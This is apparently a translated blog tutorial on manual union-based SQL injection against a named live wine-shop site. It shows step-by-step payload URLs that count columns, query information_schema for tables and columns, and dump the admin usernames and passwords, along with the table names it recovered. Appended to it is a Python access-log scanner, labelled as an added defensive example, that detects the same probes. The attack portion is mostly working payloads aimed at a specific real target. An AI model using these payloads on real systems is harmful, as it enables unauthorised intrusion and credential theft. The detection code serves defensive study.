PHP Manual SQL Injection Tutorial

1.

Determine the column count

http://www.osy-wine.com/news_show.php?id=-61 order by 24 returns an error, which shows the column count is 24

View database information

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,user(),3,4,database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

version() -------- 5.0.91-log (the version)

Every version from 5.0 upward ships with a virtual database named information_schema, which holds the metadata for all databases.

database() ------- osywine

2.

Use the information_schema virtual database to dump the tables

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables+where+table_schema=0x6F737977696E65+limit+1,1

Append limit+0,1, limit+1,1, and so on to query the next table.

This reveals the admin table.

3.

Use the table to dump its columns

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E

This reveals id

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+1,1

This reveals username

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+2,1

This reveals password

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin

This dumps the user names and passwords directly

**********************************************************************************

Second method (more convenient and faster)

Dump all tables in one go

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_schema=0x6F737977696E65

0x6F737977696E65 is osywine in hexadecimal

All the tables are as follows:

aboutweb,admin,blog,ggao,liuyan,member,news,news_class,news_class2,photo,photo_class,products,products_class,products_class2,settle_accounts,shoping,youqinglj

Dump all columns in one go

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E

0x61646D696E is admin in hexadecimal

All the columns are as follows:

id,username,password

Then comes the last step: dump the user names and passwords directly.

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+username,0x5f,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin

Note: every + sign above stands for a space; /**/ can be used in its place as well. Different situations call for different analysis!
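As an added, defensive example that is not part of the original post: a small Python scanner that normalises each request's query string (URL-decoding the + signs and stripping the /**/ comments mentioned in the note) and flags the probe patterns this tutorial relies on (order by N, union select, information_schema lookups, hex-encoded names, GROUP_CONCAT, user()/database()/version()) in access-log lines. The log lines, the host, the client addresses and the tag names are constructed assumptions, not data from the page.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qs

# Constructed Apache-style access-log sample for a hypothetical host; the
# query strings mirror the shape of the probes described in the tutorial.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Nov/2018:10:01:02 +0800] "GET /news_show.php?id=61 HTTP/1.1" 200 5120
203.0.113.5 - - [17/Nov/2018:10:01:09 +0800] "GET /news_show.php?id=-61+order+by+24 HTTP/1.1" 500 312
203.0.113.5 - - [17/Nov/2018:10:01:15 +0800] "GET /news_show.php?id=-61+union+select+1,user(),3,database(),version() HTTP/1.1" 200 4871
203.0.113.5 - - [17/Nov/2018:10:01:22 +0800] "GET /news_show.php?id=-61+union+select+1,table_name,3+from+information_schema.tables+where+table_schema=0x6F737977696E65+limit+1,1 HTTP/1.1" 200 4902
203.0.113.5 - - [17/Nov/2018:10:01:30 +0800] "GET /news_show.php?id=-61/**/union/**/select/**/1,GROUP_CONCAT(DISTINCT+column_name)/**/from/**/information_schema.columns HTTP/1.1" 200 4950
198.51.100.7 - - [17/Nov/2018:10:02:00 +0800] "GET /news_show.php?id=62 HTTP/1.1" 200 5098
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures run against the normalised (decoded, comment-stripped, lower-cased) query.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border by \d+\b"),
    "union_select": re.compile(r"\bunion (all )?select\b"),
    "information_schema": re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{4,}\b"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "db_fingerprint": re.compile(r"\b(user|database|version)\s*\(\s*\)"),
}

def normalise(query: str) -> str:
    """Decode %xx and '+' to spaces, replace /**/ comments with a space, collapse whitespace."""
    text = unquote_plus(query)
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text).strip().lower()

def classify(target: str) -> list:
    """Return the signature tags that fire on one request target (path?query)."""
    parts = urlsplit(target)
    norm = normalise(parts.query)
    tags = [name for name, rx in SIGNATURES.items() if rx.search(norm)]
    # The id= parameter should only ever be an integer; anything else is worth a tag.
    for value in parse_qs(parts.query).get("id", []):
        if not re.fullmatch(r"-?\d+", value.strip()):
            tags.append("non_numeric_id")
            break
    return tags

def scan_log(text: str) -> list:
    """Parse access-log lines and return those carrying injection signatures."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (tags := classify(m["target"])):
            hits.append({"ip": m["ip"], "status": m["status"],
                         "path": urlsplit(m["target"]).path, "tags": tags})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

On the sample above the scanner reports the four probing requests from 203.0.113.5 and ignores the two ordinary integer lookups; the `non_numeric_id` tag alone is enough to catch the whole family, whatever spacing trick is used.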

Original link: https://kuaibao.qq.com/s/20181117G0RTRH00?refer=cp_1026